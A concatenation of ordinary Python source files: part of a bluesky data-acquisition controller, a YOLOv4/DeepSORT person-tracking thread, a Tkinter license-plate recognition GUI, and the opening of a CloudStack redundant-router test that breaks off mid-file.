# Only try this once if it fails to prevent repeated timeouts
self._check_run_number_has_failed = True
else:
next_run = None
def start_thread(control, status, events, duration, use_l3t, controls,
run_number):
tmo = self._begin_timeout
dt = 0.1
logger.debug('Make sure daq is ready to begin')
# Stop and start if we already started
if self.state in ('Open', 'Running'):
self.stop()
# It can take up to 0.4s after a previous begin to be ready
while tmo > 0:
if self.state in ('Configured', 'Open'):
break
else:
tmo -= dt
if self.state in ('Configured', 'Open'):
begin_args = self._begin_args(events, duration, use_l3t,
controls)
if run_number is not None:
logger.info('Beginning daq run %s', run_number)
logger.debug('daq.control.begin(%s)', begin_args)
dt = time.time() - self._last_stop
tmo = BEGIN_THROTTLE - dt
if tmo > 0:
time.sleep(tmo)
control.begin(**begin_args)
# Cache these so we know what the most recent begin was told
self._begin = dict(events=events, duration=duration,
use_l3t=use_l3t, controls=controls)
logger.debug('Marking kickoff as complete')
status.set_finished()
else:
logger.debug('Marking kickoff as failed')
status.set_exception(RuntimeError('Daq begin failed!'))
begin_status = Status(obj=self)
watcher = threading.Thread(target=start_thread,
args=(self._control, begin_status, events,
duration, use_l3t, controls,
next_run))
watcher.start()
return begin_status
def complete(self):
"""
If the daq is freely running, this will `stop` the daq.
Otherwise, we'll simply collect the end_status object.
Returns
-------
end_status: ``Status``
``Status`` that will be marked as done when the DAQ has finished
acquiring
"""
logger.debug('Daq.complete()')
end_status = self._get_end_status()
if not (self._events or self._duration):
# Configured to run forever
self.stop()
return end_status
def _get_end_status(self):
"""
Return a `Status` object that will be marked done when the DAQ has
finished acquiring.
This will be marked as done immediately if the daq is configured to run
forever, because waiting for the end doesn't make sense in this case.
Returns
-------
end_status: `Status`
"""
logger.debug('Daq._get_end_status()')
events = self._events
duration = self._duration
if events or duration:
logger.debug('Getting end status for events=%s, duration=%s',
events, duration)
def finish_thread(control, status):
try:
logger.debug('Daq.control.end()')
control.end()
except RuntimeError:
pass # This means we aren't running, so no need to wait
self._last_stop = time.time()
self._reset_begin()
status.set_finished()
logger.debug('Marked acquisition as complete')
end_status = Status(obj=self)
watcher = threading.Thread(target=finish_thread,
args=(self._control, end_status))
watcher.start()
return end_status
else:
# Configured to run forever, say we're done so we can wait for just
# the other things in the scan
logger.debug('Returning finished status for infinite run with '
'events=%s, duration=%s', events, duration)
status = Status(obj=self)
status.set_finished()
return status
def collect(self):
"""
Collect data as part of the ``bluesky`` ``Flyer`` interface.
As per the ``bluesky`` interface, this is a generator that is expected
to output partial event documents. However, since we don't have any
events to report to python, this will be a generator that immediately
ends.
"""
logger.debug('Daq.collect()')
yield from ()
def describe_collect(self):
"""
As per the ``bluesky`` interface, this is how you interpret the null
data from `collect`. There isn't anything here, as nothing will be
collected.
"""
logger.debug('Daq.describe_collect()')
return {}
def preconfig(self, events=_CONFIG_VAL, duration=_CONFIG_VAL,
record=_CONFIG_VAL, use_l3t=_CONFIG_VAL,
controls=_CONFIG_VAL, begin_sleep=_CONFIG_VAL,
show_queued_cfg=True):
"""
Queue configuration parameters for next call to `configure`.
These will be overridden by arguments passed directly to `configure`.
These will be cleared after each call to `configure`.
This can be used to `configure` the `Daq` object without connecting.
This will display the next queued configuration using logger.info,
assuming the logger has been configured.
"""
# Only one of (events, duration) should be preconfigured.
if events is not _CONFIG_VAL:
self._desired_config['events'] = events
self._desired_config['duration'] = None
elif duration is not _CONFIG_VAL:
self._desired_config['events'] = None
self._desired_config['duration'] = duration
for arg, name in zip((record, use_l3t, controls, begin_sleep),
('record', 'use_l3t', 'controls', 'begin_sleep')):
if arg is not _CONFIG_VAL:
self._desired_config[name] = arg
if show_queued_cfg:
self.config_info(self.next_config, 'Queued config:')
@check_connect
def configure(self, events=_CONFIG_VAL, duration=_CONFIG_VAL,
record=_CONFIG_VAL, use_l3t=_CONFIG_VAL,
controls=_CONFIG_VAL, begin_sleep=_CONFIG_VAL):
"""
Changes the daq's configuration for the next run.
All arguments omitted from the method call will default to the last
configured value in the python session.
This is the method that directly interfaces with the daq. If you simply
want to get a configuration ready for later, use `preconfig`.
Parameters
----------
events: ``int``, optional
If provided, the daq will run for this many events before
stopping, unless we override in `begin`.
If not provided, we'll use the ``duration`` argument instead.
Defaults to its last configured value, or ``None`` on the first
configure.
duration: ``int``, optional
If provided, the daq will run for this many seconds before
stopping, unless we override in `begin`.
If not provided, and ``events`` was also not provided, an empty
call like ``begin()`` will run indefinitely. You can also achieve
this behavior by passing events=None and/or duration=None, Defaults
to its last configured value, or ``None`` on the first configure.
record: ``bool``, optional
If ``True``, we'll record the data. If ``False``, we'll run without
recording. If ``None``, we'll use the option selected in the DAQ
GUI. Defaults to the its last configured value, or ``None`` on the
first configure.
use_l3t: ``bool``, optional
If ``True``, an ``events`` argument to begin will be reinterpreted
to only count events that pass the level 3 trigger. Defaults to
its last configured value, or ``False`` on the first configure.
controls: ``dict{name: device}`` or ``list[device...]``, optional
If provided, values from these will make it into the DAQ data
stream as variables. We will check ``device.position`` and
``device.value`` for quantities to use and we will update these
values each time begin is called. To provide a list, all devices
must have a ``name`` attribute. Defaults to its last configured
value, or no controls values on the first configure.
begin_sleep: ``int``, optional
The amount of time to wait after the DAQ returns begin is done.
This is a hack because the DAQ often says that a begin transition
is done without actually being done, so it needs a short delay.
Defaults to its last configured value, or 0 on the first
configure.
Returns
-------
old, new: ``tuple`` of ``dict``
The old configuration and the new configuration. These dictionaries
are verbose, containing all configuration values and the timestamps
at which they were configured, as specified by ``bluesky``.
"""
logger.debug('Daq.configure(events=%s, duration=%s, record=%s, '
'use_l3t=%s, controls=%s, begin_sleep=%s)',
events, duration, record, use_l3t, controls, begin_sleep)
state = self.state
if state not in ('Connected', 'Configured'):
err = 'Cannot configure from state {}!'.format(state)
raise StateTransitionError(err)
self._check_duration(duration)
old = self.read_configuration()
self.preconfig(events=events, duration=duration, record=record,
use_l3t=use_l3t, controls=controls,
begin_sleep=begin_sleep, show_queued_cfg=False)
config = self.next_config
events = config['events']
duration = config['duration']
record = config['record']
use_l3t = config['use_l3t']
controls = config['controls']
begin_sleep = config['begin_sleep']
logger.debug('Updated with queued config, now we have: '
'events=%s, duration=%s, record=%s, '
'use_l3t=%s, controls=%s, begin_sleep=%s',
events, duration, record, use_l3t, controls, begin_sleep)
config_args = self._config_args(record, use_l3t, controls)
try:
logger.debug('Daq.control.configure(%s)',
config_args)
self._control.configure(**config_args)
# self._config should reflect exactly the arguments to configure,
# this is different than the arguments that pydaq.Control expects
self._config = dict(events=events, duration=duration,
record=record, use_l3t=use_l3t,
controls=controls, begin_sleep=begin_sleep)
self._update_config_ts()
self.config_info(header='Daq configured:')
except Exception as exc:
self._config = None
msg = 'Failed to configure!'
logger.debug(msg, exc_info=True)
raise RuntimeError(msg) from exc
new = self.read_configuration()
self._desired_config = {}
return old, new
def config_info(self, config=None, header='Config:'):
"""
Show the config information as a logger.info message.
This will print to the screen if the logger is configured correctly.
Parameters
----------
config: ``dict``, optional
The configuration to show. If omitted, we'll use the current
config.
header: ``str``, optional
A prefix for the config line.
"""
if config is None:
config = self.config
txt = []
for key, value in config.items():
if value is not None:
txt.append('{}={}'.format(key, value))
if header:
header += ' '
logger.info(header + ', '.join(txt))
@property
def record(self):
"""
If ``True``, we'll configure the daq to record data. If ``False``, we
will configure the daq to not record data.
Setting this is the equivalent of scheduling a `configure` call to be
executed later, e.g. ``configure(record=True)``
"""
return self.next_config['record']
@record.setter
def record(self, record):
self.preconfig(record=record)
def _update_config_ts(self):
"""
Create timestamps and update the ``bluesky`` readback for
`read_configuration`
"""
for k, v in self.config.items():
old_value = self._config_ts.get(k, {}).get('value')
if old_value is None or v != old_value:
self._config_ts[k] = dict(value=v,
timestamp=time.time())
def _config_args(self, record, use_l3t, controls):
"""
For a given set of arguments to `configure`, return the arguments that
should be sent to ``pydaq.Control.configure``.
Returns
-------
config_args: dict
"""
logger.debug('Daq._config_args(%s, %s, %s)',
record, use_l3t, controls)
config_args = {}
if record is not None:
config_args['record'] = bool(record)
if use_l3t:
config_args['l3t_events'] = 0
else:
config_args['events'] = 0
if controls is not None:
config_args['controls'] = self._ctrl_arg(controls)
return config_args
def _ctrl_arg(self, controls):
"""
Assemble the list of ``(str, val)`` pairs from a ``{str: device}``
dictionary or a device ``list``
Returns
-------
ctrl_arg: ``list[(str, val), ...]``
"""
ctrl_arg = []
if isinstance(controls, list):
names = [dev.name for dev in controls]
devices = controls
elif isinstance(controls, dict):
names = controls.keys()
devices = controls.values()
for name, device in zip(names, devices):
try:
val = device.position
except AttributeError:
val = device.get()
try:
val = val[0]
except Exception:
pass
ctrl_arg.append((name, val))
return ctrl_arg
def _begin_args(self, events, duration, use_l3t, controls):
"""
For a given set of arguments to `begin`, return the arguments that
should be sent to ``pydaq.Control.begin``
Returns
-------
begin_args: ``dict``
"""
logger.debug('Daq._begin_args(%s, %s, %s, %s)',
events, duration, use_l3t, controls)
begin_args = {}
# Handle default args for events and duration
if events is _CONFIG_VAL and duration is _CONFIG_VAL:
# If both are omitted, use last configured values
events = self.config['events']
duration = self.config['duration']
if events not in (None, _CONFIG_VAL):
# We either passed the events arg, or loaded from config
if use_l3t in (None, _CONFIG_VAL) and self.configured:
use_l3t = self.config['use_l3t']
if use_l3t:
begin_args['l3t_events'] = events
else:
begin_args['events'] = events
elif duration not in (None, _CONFIG_VAL):
# We either passed the duration arg, or loaded from config
secs = int(duration)
nsec = int((duration - secs) * 1e9)
begin_args['duration'] = [secs, nsec]
else:
# We passed None somewhere/everywhere
begin_args['events'] = 0 # Run until manual stop
if controls is _CONFIG_VAL:
controls = self.config['controls']
if controls is not None:
begin_args['controls'] = self._ctrl_arg(controls)
return begin_args
def _check_duration(self, duration):
if duration not in (None, _CONFIG_VAL) and duration < 1:
msg = ('Duration argument less than 1 is unreliable. Please '
'use the events argument to specify the length of '
'very short runs.')
raise RuntimeError(msg)
def read_configuration(self):
"""
``bluesky`` interface for checking the current configuration
Returns
-------
config: ``dict``
Mapping of config key to current configured value and timestamp
when it was last set.
"""
logger.debug('Daq.read_configuration()')
return self._config_ts.copy()
def describe_configuration(self):
"""
``bluesky`` interface for describing how to interpret the configured
values
Returns
-------
config_desc: ``dict``
Mapping of config key to field metadata.
"""
logger.debug('Daq.describe_configuration()')
try:
controls_shape = [len(self.config['controls']), 2]
except (TypeError, RuntimeError, AttributeError):
controls_shape = []
return dict(events=dict(source='daq_events_in_run',
dtype='number',
shape=[]),
duration=dict(source='daq_run_duration',
dtype='number',
shape=[]),
use_l3t=dict(source='daq_use_l3trigger',
dtype='number',
shape=[]),
record=dict(source='daq_record_run',
dtype='number',
shape=[]),
controls=dict(source='daq_control_vars',
dtype='array',
shape=controls_shape),
begin_sleep=dict(source='daq_begin_sleep',
dtype='number',
shape=[]),
)
def stage(self):
"""
``bluesky`` interface for preparing a device for action.
This sets up the daq to end runs on run stop documents.
It also caches the current state, so we know what state to return to
after the ``bluesky`` scan.
If a run is already started, we'll end it here so that we can start a
new run during the scan.
Returns
-------
staged: ``list``
list of devices staged
"""
logger.debug('Daq.stage()')
self._pre_run_state = self.state
if self._re_cbid is None:
self._re_cbid = self._RE.subscribe(self._re_manage_runs)
self.end_run()
return [self]
def _re_manage_runs(self, name, doc):
"""
Callback for the RunEngine to manage run stop.
"""
if name == 'stop':
self.end_run()
def unstage(self):
"""
``bluesky`` interface for undoing the `stage` routine.
Returns
-------
unstaged: ``list``
list of devices unstaged
"""
logger.debug('Daq.unstage()')
if self._re_cbid is not None:
self._RE.unsubscribe(self._re_cbid)
self._re_cbid = None
# If we're still running, end now
if self.state in ('Open', 'Running'):
self.end_run()
# Return to the state we had at stage
if self._pre_run_state == 'Disconnected':
self.disconnect()
elif self._pre_run_state == 'Running':
self.begin_infinite()
# For other states, end_run was sufficient.
return [self]
def pause(self):
"""
``bluesky`` interface for determining what to do when a plan is
interrupted. This will call `stop`, but it will not call `end_run`.
"""
logger.debug('Daq.pause()')
if self.state == 'Running':
self.stop()
def resume(self):
"""
``bluesky`` interface for determining what to do when an interrupted
plan is resumed. This will call `begin`.
"""
logger.debug('Daq.resume()')
if self.state == 'Open':
self.begin()
@property
def _events(self):
"""
For the current `begin` cycle, how many ``events`` we told the daq to
run for.
"""
events = self._begin['events']
if events is _CONFIG_VAL:
events = self.config['events']
return events
@property
def _duration(self):
"""
For the current `begin` cycle, how long we told the daq to run for in
seconds.
"""
duration = self._begin['duration']
if duration is _CONFIG_VAL:
duration = self.config['duration']
return duration
def _reset_begin(self):
"""
Reset ``_begin`` to starting values for when we aren't running.
"""
self._begin = dict(events=None, duration=None, use_l3t=None,
controls=None)
def run_number(self, hutch_name=None):
"""
Determine the run number of the last run, or current run if running.
This requires you to be on an NFS-mounted host. If hutch can be
determined from the get_hutch_name script from engineering_tools, then
you don't need to pass in a hutch name.
This is a method and not a property because all properties are
run when you try to tab complete, and this isn't necessarily an
instant check. It can also display log messages, which would be
annoying on tab complete.
Parameters
----------
hutch_name: ``str``, optional
The hutch to check the run number for. If omitted, we'll guess
the hutch based on your session details.
Returns
-------
run_number: ``int``
The current run number, or previous run if not recording.
Raises
------
RuntimeError:
if we have no access to NFS
ValueError:
if an invalid hutch was passed
subprocess.TimeoutExpired:
if the get run number script fails
"""
try:
if hutch_name is None:
hutch_name = ext_scripts.hutch_name()
if hutch_name not in ('amo', 'sxr', 'xpp', 'xcs', 'mfx', 'cxi',
'mec', 'tst'):
raise ValueError(('{} is not a valid hutch, cannot determine '
'run number'.format(hutch_name)))
if self.state in ('Open', 'Running') and self.config['record']:
return ext_scripts.get_run_number(hutch=hutch_name, live=True)
else:
return ext_scripts.get_run_number(hutch=hutch_name, live=False)
except FileNotFoundError:
raise RuntimeError('No nfs access, cannot determine run number.')
def __del__(self):
try:
self.disconnect()
except Exception:
pass
def set_filter(self, *args, event_codes=None, operator='&',
or_bykik=False):
"""
Set up the l3t filters.
These connect through pyami to call set_l3t or clear_l3t. The function
takes in arbitrary dets whose prefixes are the ami names, along with
low and highs.
Event codes are handled as a special case, since you always want high
vs low.
.. note::
If or_bykik is True, this will treat bykik at an l3t pass! This is
so you don't lose your off shots when the l3t trigger is in veto
mode.
Parameters
----------
*args: (`AmiDet`, ``float``, ``float``) n times
A sequence of (detector, low, high), which create filters that make
sure the detector is between low and high. You can omit the first
`AmiDet` as a shorthand for the current monitor, assuming a monitor
has been set with `Daq.set_monitor` or `set_monitor_det`.
event_codes: ``list``, optional
A list of event codes to include in the filter. l3pass will be when
the event code is present.
operator: ``str``, optional
The operator for combining the detector ranges and event codes.
This can either be ``|`` to ``or`` the conditions together, so
l3pass will happen if any filter passes, or it can be left at
the default ``&`` to ``and`` the conditions together, so l3pass
will only happen if all filters pass.
or_bykik: ``bool``, optional
False by default, appends an ``or`` condition that marks l3t pass
when we see the bykik event code. This makes sure the off shots
make it into the data if we're in l3t veto mode.
"""
return set_pyami_filter(*args, event_codes=event_codes,
operator=operator, or_bykik=or_bykik)
def set_monitor(self, det):
return set_monitor_det(det)
set_monitor.__doc__ = set_monitor_det.__doc__
class StateTransitionError(Exception):
pass
_daq_instance = None
def register_daq(daq):
"""
Called by `Daq` at the end of ``__init__`` to save our one daq instance as
the real `Daq`. There will always only be one `Daq`.
Parameters
----------
daq: `Daq`
"""
global _daq_instance
_daq_instance = daq
def get_daq():
"""
Called by other modules to get the registered `Daq` instance.
Returns
-------
daq: `Daq`
"""
return _daq_instance
|
object_tracking.py |
import time
import cv2
import numpy as np
import matplotlib.pyplot as plt
from threading import Thread, Lock
from collections import deque
from deep_sort import preprocessing
from deep_sort import nn_matching
from deep_sort.detection import Detection
from deep_sort.tracker import Tracker
from deep_sort.detection import Detection as ddet
from yolov4_detection import ObjectDetectionEngine
from datetime import datetime
import areaEquation as Area
from ai_logging import LOG
max_cosine_distance = 0.5
nms_max_overlap = 0.3
nn_budget = None
METRIC = nn_matching.NearestNeighborDistanceMetric("cosine", max_cosine_distance, nn_budget)
TRACKER = Tracker(METRIC)
# Object pool for each video line
ObjectPools={'lock': Lock(), 'cam000xxx' : None}
class ObjectTracking(Thread):
def __init__(self, camera_id, stream):
Thread.__init__(self)
self.QUELENG = 3
self.isrun = False
self.camera_id = camera_id
self.stream = stream
self.origin_framePools = deque(maxlen=self.QUELENG)
self.framePools = deque(maxlen=self.QUELENG)
self.object_detection_engine = ObjectDetectionEngine()
### area equaqion init ###
self.area_equation = Area.areaEquation(self.camera_id, '', [], [])
def run(self):
# by default VideoCapture returns float instead of int
#LOG.info(self.stream)
#width = int(self.stream.get(cv2.CAP_PROP_FRAME_WIDTH))
#LOG.info(width)
#height = int(self.stream.get(cv2.CAP_PROP_FRAME_HEIGHT))
#LOG.info(height)
#fps = int(self.stream.get(cv2.CAP_PROP_FPS))
#LOG.info(fps)
### use for output avi video file ###
#codec = cv2.VideoWriter_fourcc(*'MJPG')
#out = cv2.VideoWriter('video_out.avi', codec, fps, (width, height))
self.isrun = True
th = Thread(target=lambda: self.get_frame_thread())
th.start()
while len(self.origin_framePools) == 0:
time.sleep(0.1)
while self.isrun:
(return_value, frame) = self.origin_framePools[0]
#return_value, frame = self.stream.read()
#LOG.info(return_value)
if return_value:
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
#image = Image.fromarray(frame)
else:
LOG.info('Video has ended or failed, try a different video format!')
break
#execute object detect
start_time = time.time()
results = self.object_detection_engine.perform_detection(frame)
label_list = []
my_rects = []
my_labels = []
for item in results:
xmin = item[0]
ymin = item[1]
xmax = item[2]
ymax = item[3]
label = item[4]
feature_w = abs(xmin-xmax)
feature_h = abs(ymin-ymax)
my_rects.append([xmin, ymin, feature_w, feature_h])
my_labels.append(label)
result_data = []
detections = [Detection(bbox, 1.0, None,label) for bbox, label in zip(my_rects, my_labels)]
#initialize color map
cmap = plt.get_cmap('tab20b')
colors = [cmap(i)[:3] for i in np.linspace(0, 1, 20)]
boxes = np.array([d.tlwh for d in detections])
scores = np.array([d.confidence for d in detections])
indices = preprocessing.non_max_suppression(boxes, nms_max_overlap, scores)
detections = [detections[i] for i in indices]
TRACKER.predict()
TRACKER.update(detections)
deleted_id = []
for track in TRACKER.deleted_tracks:
deleted_id.append(track.track_id)
persons = []
for track in TRACKER.tracks:
if not track.is_confirmed() or track.time_since_update > 1:
continue
bbox = track.to_tlbr()
class_name = 'person'
result_data.append((bbox[0],bbox[1],bbox[2],bbox[3],int(track.track_id),track.label,deleted_id))
# draw bbox on screen
color = colors[int(track.track_id) % len(colors)]
color = [i * 255 for i in color]
cv2.rectangle(frame, (int(bbox[0]), int(bbox[1])), (int(bbox[2]), int(bbox[3])), color, 2)
cv2.rectangle(frame, (int(bbox[0]), int(bbox[1]-30)), (int(bbox[0])+(len(class_name)+len(str(track.track_id)))*17, int(bbox[1])), color, -1)
cv2.putText(frame, class_name + "-" + str(track.track_id),(int(bbox[0]), int(bbox[1]-10)),0, 0.75, (255,255,255),2)
'''
# if enable info flag then LOG.info details about each track
# checking area for warning and danger
#LOG.info(len(bbox))
#LOG.info("Tracker ID: {}, Class: {}, BBox Coords (xmin, ymin, xmax, ymax): {}".format(str(track.track_id), class_name, (int(bbox[0]), int(bbox[1]), int(bbox[2]), int(bbox[3]))))
### bbox === [xmin, ymin, xmax, ymax] ###
#point1 = [int(bbox[0]), int(bbox[1])] # xmin, ymin
#point2 = [int(bbox[2]), int(bbox[1])] # xmax, ymin
#point1 = [int(bbox[0]), int(bbox[3])] # xmin, ymax
#point2 = [int(bbox[2]), int(bbox[3])] # xmax, ymax
'''
person = {}
person["person_id"] = track.track_id
person["bbox"] = bbox
person["time_in"] = str(datetime.now())
person["equiqments"] = []
persons.append(person)
# calculate frames per second of running detections
fps = 1.0 / (time.time() - start_time)
cv2.putText(frame, "FPS: %.2f" % fps, (8, 32), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (100, 255, 0), 3, cv2.LINE_AA)
#LOG.info("CameraID: %s, FPS: %.2f" % (self.camera_id, fps))
result = np.asarray(frame)
result = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)
#LOG.info(type(result))
frame_info = {}
frame_info['frame'] = result
frame_info['persons'] = persons
#LOG.info(frame_info)
self.framePools.append(frame_info)
#out.write(result)
if cv2.waitKey(1) & 0xFF == ord('q'): break
th.join()
def get_frame_thread(self):
while self.isrun:
return_value, frame = self.stream.read()
self.origin_framePools.append((return_value, frame))
time.sleep(1/33)
def stop(self):
self.isrun = False
|
surface.py | import tkinter as tk
from tkinter.filedialog import *
from tkinter import ttk
import predict
import cv2
from PIL import Image, ImageTk
import threading
import time
from tkinter import messagebox
import webbrowser
class Surface(ttk.Frame):
pic_path = ""
viewhigh = 600
viewwide = 600
update_time = 0
thread = None
thread_run = False
camera = None
color_transform = {"green":("绿牌","#55FF55"), "yello":("黄牌","#FFFF00"), "blue":("蓝牌","#6666FF")}
def __init__(self, win):
ttk.Frame.__init__(self, win)
frame_left = ttk.Frame(self)
frame_right1 = ttk.Frame(self)
frame_right2 = ttk.Frame(self)
frame_center= ttk.Frame(self)
win.title("车牌识别")
win.state("zoomed")
self.pack(fill=tk.BOTH, expand=tk.YES, padx="5", pady="5")
frame_left.pack(side=LEFT,expand=1,fill=BOTH)
frame_right1.pack(side=TOP,expand=1,fill=tk.Y)
frame_right2.pack(side=RIGHT,expand=0)
frame_center.pack(side=LEFT,expand=1,fill=BOTH)
Label(frame_center,text="==\n|欢|\n|迎|\n|使|\n|用|\n|车|\n|牌|\n|识|\n|别|\n|系|\n|统|\n==",fg="red",font = 'Helvetica -49 bold').pack(anchor="nw")
Label(frame_left, text='原图:',font = 'Helvetica -27 bold').pack(anchor="nw")
Label(frame_right1, text='车牌位置:',font = 'Helvetica -27 bold').grid(column=0, row=0, sticky=tk.W)
from_pic_ctl = Button(frame_right2,text="来自图片",font = 'Helvetica -29 bold',bg="grey",fg="yellow",width=20, command=self.from_pic)
from_vedio_ctl = Button(frame_right2, text="来自摄像头",font = 'Helvetica -29 bold',bg="grey",fg="yellow",width=20, command=self.from_vedio)
button3=Button(frame_right2,text="api再识别",font = 'Helvetica -29 bold',bg="grey",fg="yellow",width=20,command=self.api)
self.image_ctl = ttk.Label(frame_left)
self.image_ctl.pack(anchor="nw")
self.roi_ctl = ttk.Label(frame_right1)
self.roi_ctl.grid(column=0, row=1, sticky=tk.W)
Label(frame_right1, text='识别结果:',font = 'Helvetica -29 bold').grid(column=0, row=2, sticky=tk.W)
self.r_ctl = ttk.Label(frame_right1, text="")
self.r_ctl.grid(column=0, row=3, sticky=tk.W)
self.color_ctl = ttk.Label(frame_right1, text="", width="20")
self.color_ctl.grid(column=0, row=4, sticky=tk.W)
from_vedio_ctl.pack(anchor="se", pady="5")
from_pic_ctl.pack(anchor="se", pady="5")
button3.pack(anchor="se",pady="5")
self.predictor = predict.CardPredictor()
self.predictor.train_svm()
def get_imgtk(self, img_bgr):
img = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2RGB)
im = Image.fromarray(img)
imgtk = ImageTk.PhotoImage(image=im)
wide = imgtk.width()
high = imgtk.height()
if wide > self.viewwide or high > self.viewhigh:
wide_factor = self.viewwide / wide
high_factor = self.viewhigh / high
factor = min(wide_factor, high_factor)
wide = int(wide * factor)
if wide <= 0 : wide = 1
high = int(high * factor)
if high <= 0 : high = 1
im=im.resize((wide, high), Image.ANTIALIAS)
imgtk = ImageTk.PhotoImage(image=im)
return imgtk
def show_roi(self, r, roi, color):
if r :
roi = cv2.cvtColor(roi, cv2.COLOR_BGR2RGB)
roi = Image.fromarray(roi)
self.imgtk_roi = ImageTk.PhotoImage(image=roi)
self.roi_ctl.configure(image=self.imgtk_roi, state='enable')
self.r_ctl.configure(text=str(r))
self.update_time = time.time()
try:
c = self.color_transform[color]
self.color_ctl.configure(text=c[0], background=c[1], state='enable')
except:
self.color_ctl.configure(state='disabled')
elif self.update_time + 8 < time.time():
self.roi_ctl.configure(state='disabled')
self.r_ctl.configure(text="")
self.color_ctl.configure(state='disabled')
def from_vedio(self):
if self.thread_run:
return
if self.camera is None:
self.camera = cv2.VideoCapture(0)
if not self.camera.isOpened():
mBox.showwarning('警告', '摄像头打开失败!')
self.camera = None
return
self.thread = threading.Thread(target=self.vedio_thread, args=(self,))
self.thread.setDaemon(True)
self.thread.start()
self.thread_run = True
def api(self):
webbrowser.open("https://ai.baidu.com/tech/vehicle/car")
def from_pic(self):
self.thread_run = False
self.pic_path = askopenfilename(title="选择识别图片", filetypes=[("jpg图片", "*.jpg")])
if self.pic_path:
img_bgr = predict.imreadex(self.pic_path)
self.imgtk = self.get_imgtk(img_bgr)
self.image_ctl.configure(image=self.imgtk)
r, roi, color = self.predictor.predict(img_bgr)
self.show_roi(r, roi, color)
@staticmethod
def vedio_thread(self):
self.thread_run = True
predict_time = time.time()
while self.thread_run:
_, img_bgr = self.camera.read()
self.imgtk = self.get_imgtk(img_bgr)
self.image_ctl.configure(image=self.imgtk)
if time.time() - predict_time > 2:
r, roi, color = self.predictor.predict(img_bgr)
self.show_roi(r, roi, color)
predict_time = time.time()
print("run end")
def close_window():
print("destroy")
if surface.thread_run :
surface.thread_run = False
surface.thread.join(2.0)
win.destroy()
if __name__ == '__main__':
win=tk.Tk()
surface = Surface(win)
win.protocol('WM_DELETE_WINDOW', close_window)
win.mainloop()
|
test_redundant_router.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from nose.plugins.attrib import attr
from marvin.lib.base import (Account,
Router,
NetworkOffering,
Network,
VirtualMachine,
ServiceOffering,
Host)
from marvin.lib.utils import cleanup_resources
from marvin.lib.common import (get_domain,
get_template,
get_zone,
get_process_status)
import time
import multiprocessing
# Import Local Modules
from marvin.cloudstackTestCase import cloudstackTestCase
class TestCreateRvRNetworkOffering(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.testClient = super(
TestCreateRvRNetworkOffering,
cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.testdata = cls.testClient.getParsedTestDataConfig()
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls._cleanup = []
return
@classmethod
def tearDownClass(cls):
try:
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.cleanup = []
return
def tearDown(self):
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_createRvRNetworkOffering(self):
"""Test create RvR supported network offering
"""
# Steps to validate
# 1. create a network offering
# - all services by VirtualRouter
# - enable RedundantRouter servicecapability
# 2. enable the network offering
# Validate the following
# 1. Redundant Router offering should be created successfully and
# listed in listNetworkOfferings response
# assert if RvR capability is enabled
self.debug("Creating network offering with redundant VR capability")
try:
network_offering = NetworkOffering.create(
self.apiclient,
self.testdata["nw_off_isolated_RVR"],
conservemode=True
)
except Exception as e:
self.fail("Create network offering failed! - %s" % e)
self.debug("Enabling network offering - %s" % network_offering.name)
# Enable Network offering
network_offering.update(self.apiclient, state='Enabled')
self.cleanup.append(network_offering)
self.debug("Checking if the network offering created successfully?")
network_offs = NetworkOffering.list(
self.apiclient,
id=network_offering.id,
listall=True
)
self.assertEqual(
isinstance(network_offs, list),
True,
"List network offering should not return empty response"
)
self.assertEqual(
len(network_offs),
1,
"List network off should have newly created network off"
)
for service in network_offs[0].service:
if service.name == 'SourceNat':
self.debug("Verifying SourceNat capabilites")
for capability in service.capability:
if capability.name == 'RedundantRouter':
self.assertTrue(capability.value == 'true')
self.debug("RedundantRouter is enabled")
return
class TestCreateRvRNetwork(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.testClient = super(TestCreateRvRNetwork, cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.testdata = cls.testClient.getParsedTestDataConfig()
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.testdata["ostype"]
)
cls.testdata["small"]["zoneid"] = cls.zone.id
cls.testdata["small"]["template"] = cls.template.id
cls._cleanup = []
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.testdata["service_offering"]
)
cls._cleanup.append(cls.service_offering)
cls.network_offering = NetworkOffering.create(
cls.api_client,
cls.testdata["nw_off_isolated_RVR"],
conservemode=True
)
cls._cleanup.append(cls.network_offering)
# Enable Network offering
cls.network_offering.update(cls.api_client, state='Enabled')
return
@classmethod
def tearDownClass(cls):
try:
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.account = Account.create(
self.apiclient,
self.testdata["account"],
admin=True,
domainid=self.domain.id
)
self.cleanup = []
self.cleanup.insert(0, self.account)
return
def tearDown(self):
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
@attr(tags=["advanced", "advancedns", "ssh"])
